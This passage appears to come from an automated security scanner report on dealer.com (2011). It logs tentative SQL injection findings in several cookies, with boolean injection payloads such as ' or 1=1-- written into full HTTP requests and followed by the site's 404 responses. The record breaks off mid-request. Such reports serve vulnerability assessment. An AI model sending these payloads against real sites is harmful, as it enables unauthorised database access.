X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19986
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:11:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002659; expires=Mon, 16-Apr-2012 01:10:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>It was important that we aligned ourselves with a company that&#8217;s predicting the future.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="T
...[SNIP]...
1.18. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /services/managed-services/media/uploads/page/loading.gif

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 23410201'%20or%201%3d1--%20 and 23410201'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.123410201'%20or%201%3d1--%20; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20111
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002538; expires=Mon, 16-Apr-2012 01:08:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>All I can say is WOW! I have never seen so many leads come from a dealership website in my life. We have cut out one of our most expensive lead providers last month because we received 383 leads from our &#8230;</p>
   <cite>Internet Sales Director for a BMW dealership at a top Dealer Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We've been a client of Dealer.com going on 2 years. It's been an awesome relationship right from the get-go.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdot
...[SNIP]...

Request 2

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.123410201'%20or%201%3d2--%20; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19919
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002539; expires=Mon, 16-Apr-2012 01:08:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com for over a year now and the entire experience has been positive.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <
...[SNIP]...
1.19. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /services/managed-services/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/online-advertising/ cookie appears to be vulnerable to SQL injection attacks. The payloads 17237328%20or%201%3d1--%20 and 17237328%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./products/online-advertising/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=117237328%20or%201%3d1--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20161
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002478; expires=Mon, 16-Apr-2012 01:07:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>Total Control Dominator has really helped us out, and the fact that it is integrated with a lot of other functions on the website is very helpful.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The transition to Dealer.com from our previous provider was way beyond my expectations. If someone were to contact me for advice regarding which website provider would be the best, I would say Dealer.com, hands down. </p>
   <cite>Justin Brun, Acton Toyota of Littleton</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-video-smartsites.jpg" alt="Bring your inventory to life with Video Enhanced Websites" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spo
...[SNIP]...

Request 2

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=117237328%20or%201%3d2--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20085
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:08:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002479; expires=Mon, 16-Apr-2012 01:07:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>With Dealer.com&#8217;s new tool for managing your online reputation, you&#8217;ll be able to be on their platform and launch content out to the world and not have to login to all these different social media platforms.</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We've been a client of Dealer.com going on 2 years. It's been an awesome relationship right from the get-go.</p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p> If I were to suggest any web provider in the world, I would suggest Dealer.com. Sign up today!</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads
...[SNIP]...
1.20. http://www.dealer.com/services/managed-services/media/uploads/page/loading.gif [exp_last_visit cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /services/managed-services/media/uploads/page/loading.gif

Issue detail

The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the exp_last_visit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161'%20and%201%3d1--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20167
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:06:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002419; expires=Mon, 16-Apr-2012 01:06:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>The back-end tool is one of the simplest I've seen. It's like working with a Microsoft Office program. Everything is easily spelled out for you.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Unlike TV, newspaper or radio, where I know they just want me to up my budget, I feel like the people at dealer.com actually give me suggestions and I'll be able to track everything to make sure that it works and &#8230;</p>
   <cite>Chris Comisky, Nemer Motor Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Tech Support is phenomenal. Anytime I have an issue&#8212;which is actually very rare&#8212;it's always a minor issue that gets taken care of right then and there, while I'm on the phone. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/websites/videosmartsites/" title="Video SmartSites Spotlight"><img src="http://
...[SNIP]...

Request 2

GET /services/managed-services/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/services/managed-services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161'%20and%201%3d2--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002365; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fservices%2Fmanaged-services%2F%22%3Bi%3A1%3Bs%3A29%3A%22%2Fproducts%2Fonline-advertising%2F%22%3Bi%3A2%3Bs%3A29%3A%22%2Fsolutions%2Ffranchise-dealers%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.7.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20225
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:07:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002419; expires=Mon, 16-Apr-2012 01:06:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We&#8217;re getting more qualified traffic to our website. We&#8217;re getting more qualified leads and we&#8217;re closing a higher percentage of them.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We have been with Dealer.com now almost 3 years and we&#8217;re most impressed with the customer service and technology that they provide us.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We went from a site that was converting at a rate of 2 or 3 percent. Now we&#8217;re converting at 10, 11, 12, 13 percent depending on the month.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-adv
...[SNIP]...
1.21. http://www.dealer.com/solutions/agencies/media/uploads/page/loading.gif [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /solutions/agencies/media/uploads/page/loading.gif

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /solutions/agencies/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/solutions/agencies/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
